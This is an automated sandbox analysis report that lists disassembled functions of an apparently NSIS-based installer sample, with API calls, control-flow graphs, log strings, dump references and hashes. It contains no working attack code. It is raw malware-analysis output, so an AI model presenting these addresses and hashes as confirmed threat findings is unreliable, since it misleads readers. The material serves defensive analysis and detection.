                                                                                                                                                                                                                                                                              Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 830 402713-40273b call 406035 * 2 835 402746-402749 830->835 836 40273d-402743 call 40145c 830->836 838 402755-402758 835->838 839 40274b-402752 call 40145c 835->839 836->835 842 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 838->842 843 40275a-402761 call 40145c 838->843 839->838 843->842
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                              • String ID: <RM>$QuarterWalt$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                              • API String ID: 247603264-2360060177
                                                                                                                                                                                                                                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                              Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 851 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 862 402223-4030f2 call 4062cf 851->862 863 40220d-40221b call 4062cf 851->863 863->862
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                              • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                              Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 871 405eab-405eb7 872 405eb8-405eec GetTickCount GetTempFileNameW 871->872 873 405efb-405efd 872->873 874 405eee-405ef0 872->874 876 405ef5-405ef8 873->876 874->872 875 405ef2 874->875 875->876
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                              Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 877 402175-40218b call 401446 * 2 882 402198-40219d 877->882 883 40218d-402197 call 4062cf 877->883 884 4021aa-4021b0 EnableWindow 882->884 885 40219f-4021a5 ShowWindow 882->885 883->882 887 4030e3-4030f2 884->887 885->887
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: HideWindow
                                                                                                                                                                                                                                                                              • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                              Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                              Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                              Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                              Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                              Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
